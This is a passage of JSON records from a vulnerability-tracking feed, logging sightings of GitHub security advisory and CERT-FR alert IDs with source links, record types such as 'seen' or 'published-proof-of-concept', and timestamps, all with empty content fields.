"source": "https://bsky.app/profile/bot-de-florian.bsky.social/post/3mw3kfeyfrn2n", "content": "", "creation_timestamp": "2026-09-22T06:00:50.859474Z"}, {"uuid": "017e4c1e-974f-4ab6-9020-16173c081926", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PH86-9MCX-3P6R", "type": "seen", "source": "https://t.me/GithubRedTeam/102996", "content": "", "creation_timestamp": "2026-09-22T06:00:04.690215Z"}, {"uuid": "bfdbf550-996b-4300-a9f6-e63e9e2a04bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8grh-q73j-ffrc", "type": "seen", "source": "https://bsky.app/profile/0daynews.bsky.social/post/3mw3ack3lfg23", "content": "", "creation_timestamp": "2026-09-22T03:00:18.964148Z"}, {"uuid": "66a1c77d-3fb5-4ef8-a86c-1ad9aacf5d44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JHJP-4C2Q-XMX4", "type": "seen", "source": "https://gist.github.com/alon710/f0da16101e0126a7387302a2b36a1565", "content": "", "creation_timestamp": "2026-09-22T01:31:26.674646Z"}, {"uuid": "0f15a58d-a9df-4f2a-823b-020962234a58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hf33-q6cf-c66f", "type": "seen", "source": "https://gist.github.com/alon710/9d98bc19a160c740db04b0c738bd9724", "content": "", "creation_timestamp": "2026-09-22T00:31:44.622093Z"}, {"uuid": "55ab6b44-0e3b-4116-b4bd-783eac5f35f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-88QP-4G94-3RF3", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3472", "content": "", "creation_timestamp": "2026-09-22T00:00:09.671512Z"}, {"uuid": "416f9f1e-c643-4df1-afb5-f64172e38710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-grh8-3p95-f9rr", "type": "seen", "source": "https://gist.github.com/alon710/206e1d7f5d7a93ae1831f66088f759d5", "content": "", "creation_timestamp": "2026-09-16T11:31:08.542331Z"}, {"uuid": "bf954fff-179a-4e65-adb5-41402ad42a97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jrpm-956j-96jg", "type": "seen", "source": "https://gist.github.com/alon710/6236e1774119e3087877ec4be7fad5a0", "content": "", "creation_timestamp": "2026-09-16T10:31:48.236718Z"}, {"uuid": "7dbcd959-2390-4a88-b368-7cb4393691fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cp4q-fqw9-4hf6", "type": "seen", "source": "https://gist.github.com/alon710/1d7bf0359f0215ea04330c59b303d19c", "content": "", "creation_timestamp": "2026-09-16T09:31:31.477457Z"}, {"uuid": "4c2e95d6-e942-40a8-accf-d437e7fe9182", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7gcf-g7xr-8hxj", "type": "seen", "source": "https://gist.github.com/konard/c75c144385121c66aab9af215012c487", "content": "", "creation_timestamp": "2026-09-16T08:42:54.372365Z"}, {"uuid": "38ab65ce-e5b5-4455-9017-59d0472514af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-crq5-92j2-j7wv", "type": "seen", "source": "https://gist.github.com/alon710/fead0572986f52123b115657c419a992", "content": "", "creation_timestamp": "2026-09-16T08:31:24.073311Z"}, {"uuid": "7f0f95d7-5325-47a8-8327-5e64761e5b4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5hq8-qhww-jm7q", "type": "seen", "source": "https://gist.github.com/alon710/013ea36d9ece4cb8727c52246b863fd0", "content": "", "creation_timestamp": "2026-09-16T07:35:07.654140Z"}, {"uuid": "e3a3f92e-561e-4e8d-a334-805a2440ac5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mrrh-fwg8-r2c3", "type": "seen", "source": "https://bsky.app/profile/levelbrook.bsky.social/post/3mvmfznhknj2w", "content": "", "creation_timestamp": "2026-09-16T05:32:46.134006Z"}, {"uuid": "e6093330-6fa4-4c70-8a3d-ad749ccd14f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xv9m-fm3w-8w5x", "type": "seen", "source": "https://gist.github.com/alon710/a0fdd505cf6388a20a8132f22b04c968", "content": "", "creation_timestamp": "2026-09-15T01:32:02.796578Z"}, {"uuid": "6604d4d3-28f0-4ed2-b5ef-c615328e9283", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2ff2-mx52-q8wp", "type": "seen", "source": "https://gist.github.com/alon710/65b5c64d62229349e54e21de9ec5c14b", "content": "", "creation_timestamp": "2026-09-15T00:31:20.468567Z"}, {"uuid": "6d9d0041-3fbe-48cf-986c-dfbffd225c78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vrh8-c9cm-wh8v", "type": "seen", "source": "https://gist.github.com/alon710/5201f77ce91c5d1ec9edcecc53a2d050", "content": "", "creation_timestamp": "2026-09-14T23:32:13.151595Z"}, {"uuid": "9962d041-bcbb-4813-9d26-9894c2ef9beb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v859-c572-qh5p", "type": "seen", "source": "https://gist.github.com/alon710/526da095cc70f5c9bf54550d012a3cd3", "content": "", "creation_timestamp": "2026-09-14T22:32:03.251025Z"}, {"uuid": "6c4f6de8-ffc5-4eeb-8b77-9230c728c6ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9j48-x3c3-mrp2", "type": "seen", "source": "https://bsky.app/profile/technotenshi.bsky.social/post/3mvj4rrlolk2t", "content": "", "creation_timestamp": "2026-09-14T22:09:19.397719Z"}, {"uuid": "a4ee5f22-5115-4152-a80d-4fd4198d6e80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2xmm-m4wv-3fjh", "type": "seen", "source": "https://gist.github.com/alon710/baad95ed8a6cf5e02f207178d3a44686", "content": "", "creation_timestamp": "2026-09-14T21:31:27.931306Z"}, {"uuid": "39862a7d-6338-46e8-bfdc-1ab8668dec2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rrxg-g2pf-6hh4", "type": "seen", "source": "https://gist.github.com/alon710/3693f8803a657bff4ffb362747901533", "content": "", "creation_timestamp": "2026-09-14T19:32:08.594827Z"}, {"uuid": "f543a361-55fc-4dd0-93f4-ace624c789f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rrxg-g2pf-6hh4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117270781388053699", "content": "", "creation_timestamp": "2026-09-14T18:21:58.184872Z"}, {"uuid": "83a041c6-8cf1-4f8b-8b44-5fbc7262ab84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-325j-mg25-8q58", "type": "seen", "source": "https://gist.github.com/alon710/880dc77a6d2d63a35f137e7b084bf95b", "content": "", "creation_timestamp": "2026-09-14T16:32:17.202471Z"}, {"uuid": "ca338bcf-2297-4fa0-8c38-42aff317f134", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4v52-7q2x-v4xj", "type": "seen", "source": "https://gist.github.com/Reilley64/5281c3e3797df1ef31d3e4100483a1a1", "content": "", "creation_timestamp": "2026-09-14T15:45:28.779732Z"}, {"uuid": "f9b4dbc6-36e1-475b-848a-b4da8d2878ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7g4w-cg88-2cq2", "type": "seen", "source": "https://bsky.app/profile/z3usalmighty.bsky.social/post/3mvd4cym3ti24", "content": "", "creation_timestamp": "2026-09-12T12:45:05.253522Z"}, {"uuid": "9435a2f0-f0bb-41e1-909a-eeb8842d10fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-010", "type": "seen", "source": "https://bsky.app/profile/bot-de-florian.bsky.social/post/3mvcfog3rzx2g", "content": "", "creation_timestamp": "2026-09-12T05:59:52.084562Z"}, {"uuid": "a477481c-c19e-4baf-a844-aa4e4a2cb7c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vwc7-r8mq-g2x9", "type": "seen", "source": "https://gist.github.com/cooperability/ba9878f24cf127b7725c67ffecb0bc4d", "content": "", "creation_timestamp": "2026-09-12T05:39:11.005722Z"}, {"uuid": "00d538a4-ab75-4015-b443-65578f6e3956", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-98q5-5qh2-7w75", "type": "seen", "source": "https://gist.github.com/alon710/c05d2b733514467507b538dab5375550", "content": "", "creation_timestamp": "2026-09-12T04:32:07.862396Z"}, {"uuid": "b67070cd-7ead-4095-83b1-b8cb84071ea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2j95-gqxf-v3vg", "type": "seen", "source": "https://gist.github.com/alon710/bd396251a8687bea5416d129d9cb5f66", "content": "", "creation_timestamp": "2026-09-12T03:31:29.331613Z"}, {"uuid": "929769c7-f45f-4378-bfda-12586aae9ab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c476-6w5q-jw77", "type": "seen", "source": "https://gist.github.com/alon710/bdeb340c6c170113e47b6e3cbfb5203b", "content": "", "creation_timestamp": "2026-09-11T11:09:30.425407Z"}, {"uuid": "c967cc6b-4bc9-4306-93ab-1d5fec46d520", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4QH7-66XV-H329", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/102013", "content": "", "creation_timestamp": "2026-09-11T11:00:04.938704Z"}, {"uuid": "cefaa39b-cf08-494e-aa6f-865ae23c9a89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CRJC-6VC7-XRFH", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/102014", "content": "", "creation_timestamp": "2026-09-11T11:00:04.851827Z"}, {"uuid": "cec99e8b-d286-44e2-87a8-6580ad7b9ff3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-010", "type": "seen", "source": "https://bsky.app/profile/bot-de-florian.bsky.social/post/3mv7v2aa4gf2p", "content": "", "creation_timestamp": "2026-09-11T05:56:55.357357Z"}, {"uuid": "7bdf2557-9890-47db-bdf3-6d072a853daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5293-FCM6-FH8V", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/101902", "content": "", "creation_timestamp": "2026-09-11T00:00:45.429636Z"}, {"uuid": "5a956be7-42b2-4b1e-ba67-627384397f26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5293-FCM6-FH8V", "type": "published-proof-of-concept", "source": "Telegram/IahIDovOHUenK705G5amLwAL2bDi62zGVyXyTF_rKtdPZaM", "content": "", "creation_timestamp": "2026-09-11T00:00:09.126961Z"}, {"uuid": "3183ead7-3156-42e9-94f7-bca36e7e118e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qqjf-53cj-pwvv", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mv76uxdg5z2t", "content": "", "creation_timestamp": "2026-09-10T23:20:16.103547Z"}, {"uuid": "822ee356-511a-4f85-8f1d-5f9994ff9094", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5293-FCM6-FH8V", "type": "seen", "source": "Telegram/IahIDovOHUenK705G5amLwAL2bDi62zGVyXyTF_rKtdPZaM", "content": "", "creation_timestamp": "2026-09-10T23:00:04.383091Z"}, {"uuid": "db444e96-9821-4dda-aab5-b290df99d299", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JQ6G-CCMP-VCCR", "type": "published-proof-of-concept", "source": "https://t.me/Intel_Encyclopedia/2852", "content": "", "creation_timestamp": "2026-09-10T00:00:46.225965Z"}, {"uuid": "938e8594-ac88-40cd-9ea5-6936a4181d92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7w5x-hrqm-74c2", "type": "seen", "source": "https://gist.github.com/alon710/d1e0c342d90c380e5c2e016452073fb0", "content": "", "creation_timestamp": "2026-09-09T19:31:51.837259Z"}, {"uuid": "a1717f5b-6f15-4350-bcbe-1ecf0c775abc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rvx4-ffvw-m9q3", "type": "seen", "source": "https://gist.github.com/alon710/a3c9901fd3145b4f83e29fe00422ecb3", "content": "", "creation_timestamp": "2026-09-09T14:32:49.577416Z"}, {"uuid": "270bb368-0831-4a96-9f54-14e25f08011d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-376h-93r7-7g6f", "type": "seen", "source": "https://gist.github.com/alon710/7126befe2979de3ccb30920f1ef42fab", "content": "", "creation_timestamp": "2026-09-09T13:33:00.076706Z"}, {"uuid": "bd4830d2-e43a-46dc-8c8b-703c684be9f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-26W7-CXV4-GFX2", "type": "seen", "source": "https://gist.github.com/alon710/11e7eed7c8dbba64dfd17240ce29c0f4", "content": "", "creation_timestamp": "2026-09-09T12:32:30.239799Z"}, {"uuid": "91418152-0d54-494a-9a05-46b3310d0d70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2x7j-588g-ccc2", "type": "seen", "source": "https://gist.github.com/alon710/bd83a6e5a1c5d7e3eb1a208578e25c78", "content": "", "creation_timestamp": "2026-09-09T00:32:15.663001Z"}, {"uuid": "bc4a74fe-6be5-4a81-af84-c0d2b6fb4462", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WMMP-3585-3RMP", "type": "seen", "source": "https://gist.github.com/alon710/5d16343ca1e4ea17a35c27f6e94b12c6", "content": "", "creation_timestamp": "2026-09-08T23:32:32.964380Z"}, {"uuid": "fb945880-eb9b-4736-94e7-8ee593bf09f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hgx-277f-7vmg", "type": "seen", "source": "https://gist.github.com/alon710/945de2feac7eaeacc7983ae793855e7b", "content": "", "creation_timestamp": "2026-09-08T22:32:40.218718Z"}, {"uuid": "a6f68115-9690-4546-a2b2-5e2e61842151", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-97qj-x29f-37w7", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3muznaeuf6c26", "content": "", "creation_timestamp": "2026-09-08T18:21:13.664803Z"}, {"uuid": "a5ff7906-20c2-4120-8c6b-10b2b7c7cf6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7g4w-cg88-2cq2", "type": "seen", "source": "https://bsky.app/profile/z3usalmighty.bsky.social/post/3muzdffgu2524", "content": "", "creation_timestamp": "2026-09-08T15:25:07.834561Z"}, {"uuid": "103ea2a6-50b7-46eb-96e5-f3c8d38cb946", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f88m-g3jw-g9cj", "type": "seen", "source": "https://bsky.app/profile/kakkokari-gtyih.misskey.io.ap.brid.gy/post/3mutvv2wexkm2", "content": "", "creation_timestamp": "2026-09-06T11:40:11.924091Z"}, {"uuid": "52da570c-9625-4213-b9a3-ff0ee57c38c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M358-G4RP-533R", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/44499", "content": "", "creation_timestamp": "2026-09-06T07:00:06.108711Z"}, {"uuid": "0f8f2994-3e3d-4055-80d0-545e8d8f3a89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-009", "type": "seen", "source": "https://bsky.app/profile/bot-de-florian.bsky.social/post/3mutcpqibzs22", "content": "", "creation_timestamp": "2026-09-06T05:56:59.483505Z"}, {"uuid": "53b153b4-888c-496e-916a-f51e8e0aba3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wgwx-479j-23vq", "type": "seen", "source": "https://gist.github.com/alon710/0ef37619359f1c245a80d0fc123877cc", "content": "", "creation_timestamp": "2026-09-04T12:31:49.484379Z"}, {"uuid": "0355307f-f42f-4769-bc39-70ae4f176a62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q2vg-7qgx-x5fc", "type": "seen", "source": "https://gist.github.com/alon710/5faf93883253b8cbdcfb378cbb150745", "content": "", "creation_timestamp": "2026-09-04T11:32:02.020864Z"}, {"uuid": "ca669256-d06a-4744-9c59-3327c2a12b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mw8r-mw84-88v2", "type": "seen", "source": "https://gist.github.com/alon710/a4cc1353ab9f041fddf6785afea35431", "content": "", "creation_timestamp": "2026-09-04T10:31:45.279614Z"}, {"uuid": "32c18a8a-21cd-4d11-986c-90a8041940f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vx42-ghc9-gw65", "type": "seen", "source": "https://bsky.app/profile/andrewnez.mastodon.social.ap.brid.gy/post/3muoq56t7hf22", "content": "", "creation_timestamp": "2026-09-04T10:14:03.310934Z"}, {"uuid": "97c1eaca-9c26-42b1-afb5-b174848d0f7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pfvf-fwfp-25mp", "type": "seen", "source": "https://bsky.app/profile/strawberry.rocks/post/3muopeviwkv2k", "content": "", "creation_timestamp": "2026-09-04T10:00:16.064631Z"}, {"uuid": "4ed3aad3-bf81-4f2e-abd3-39628e6a147d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3mp7-4rh5-jrv9", "type": "seen", "source": "https://gist.github.com/alon710/942448215c158ca42cd356ec66bc6d93", "content": "", "creation_timestamp": "2026-09-04T09:32:48.581460Z"}, {"uuid": "9b630f9d-a650-4615-a188-c50c47e35663", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7488-6r32-c95q", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3muokph55rg26", "content": "", "creation_timestamp": "2026-09-04T08:36:41.273307Z"}, {"uuid": "8788e4b1-1058-4c63-8099-fb6f9480c2d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v7ph-r5r6-4jcj", "type": "seen", "source": "https://gist.github.com/alon710/4e3a59a46f5538004facf996eb24fc2d", "content": "", "creation_timestamp": "2026-09-04T08:32:32.477300Z"}, {"uuid": "c9c65ca6-2fe7-4d45-af4f-fe5dc2b7da86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x67c-8pwr-m8g3", "type": "seen", "source": "https://gist.github.com/alon710/428fa3e523bd4efb06d0f15759388e47", "content": "", "creation_timestamp": "2026-09-04T07:31:42.112599Z"}, {"uuid": "ad368a1b-214e-4f3d-a8cb-b2bc29aaffc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6mcf-g667-w3qv", "type": "seen", "source": "https://gist.github.com/alon710/fbf800eaf7af09313d5329c1498b751c", "content": "", "creation_timestamp": "2026-09-04T06:33:11.263540Z"}, {"uuid": "c5d22600-51bc-42eb-bb6d-ebf2db430dfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-67x2-mq63-v9vm", "type": "seen", "source": "https://gist.github.com/alon710/4b6d07ad637cc3c13ae34977d7426539", "content": "", "creation_timestamp": "2026-09-04T05:31:58.348225Z"}, {"uuid": "4f46b5c4-7c5e-4d6c-b0b0-0a9106e1575a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vpjw-wf5h-cgpq", "type": "seen", "source": "https://gist.github.com/alon710/8322b53a1d7bba7f1109796c874a5f4c", "content": "", "creation_timestamp": "2026-09-04T04:32:14.360419Z"}, {"uuid": "c2f968b3-519b-4a53-aab9-3ded6c255362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jv8v-xq2h-657v", "type": "seen", "source": "https://gist.github.com/alon710/be44b044fa32d940cf485868087a9fe9", "content": "", "creation_timestamp": "2026-09-04T03:32:06.275091Z"}, {"uuid": "c395f6b1-7e9c-4e08-9506-408f44a53e86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8x84-r2ff-h8pq", "type": "seen", "source": "https://gist.github.com/alon710/a6fd2dd8c86786415f62d46033a7b9e2", "content": "", "creation_timestamp": "2026-09-04T03:02:58.297284Z"}, {"uuid": "d7688744-bd71-4e31-9542-96933f96f161", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5fhr-f75j-8wr9", "type": "seen", "source": "https://gist.github.com/alon710/e7f11f4247b66892a17548a4438b01cd", "content": "", "creation_timestamp": "2026-09-04T00:53:19.983029Z"}, {"uuid": "a1c1402f-29c4-419e-b438-af75998131e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5JP3-339H-VXQW", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/100896", "content": "", "creation_timestamp": "2026-09-04T00:00:54.027867Z"}, {"uuid": "7ba56f35-a6ad-449c-bc3c-f842f2a03dec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7mqg-cx4g-x2rf", "type": "seen", "source": "https://gist.github.com/alon710/43bf5918e3d482ece766ad1a3e45b23b", "content": "", "creation_timestamp": "2026-09-03T09:31:44.214588Z"}, {"uuid": "539db4c5-aea0-42be-a005-3314d20b6a02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VVXF-F8Q9-86GH", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/184244", "content": "", "creation_timestamp": "2026-09-03T00:00:36.762102Z"}, {"uuid": "b91d9c5b-6628-4d3b-81a0-9f93add732d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4q39-2jhr-7qx8", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mul46lxbqp2y", "content": "", "creation_timestamp": "2026-09-02T23:38:43.862134Z"}, {"uuid": "e9b008bc-16a0-424f-b348-8bcfc2e9934e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-76g3-c3x4-crvx", "type": "seen", "source": "https://gist.github.com/alon710/8ee7b622d5b0dab3696cbd7281b1320e", "content": "", "creation_timestamp": "2026-09-02T23:31:42.705142Z"}, {"uuid": "b94067a3-280b-4934-b62d-e2688f691ba0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jrrm-9hc7-2v3h", "type": "seen", "source": "https://gist.github.com/alon710/b615767eb56d905c1ec60c5678ca05fa", "content": "", "creation_timestamp": "2026-09-02T22:32:18.152081Z"}, {"uuid": "6cbd1af5-69a2-49d3-a6cb-5288a2eaeaf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": 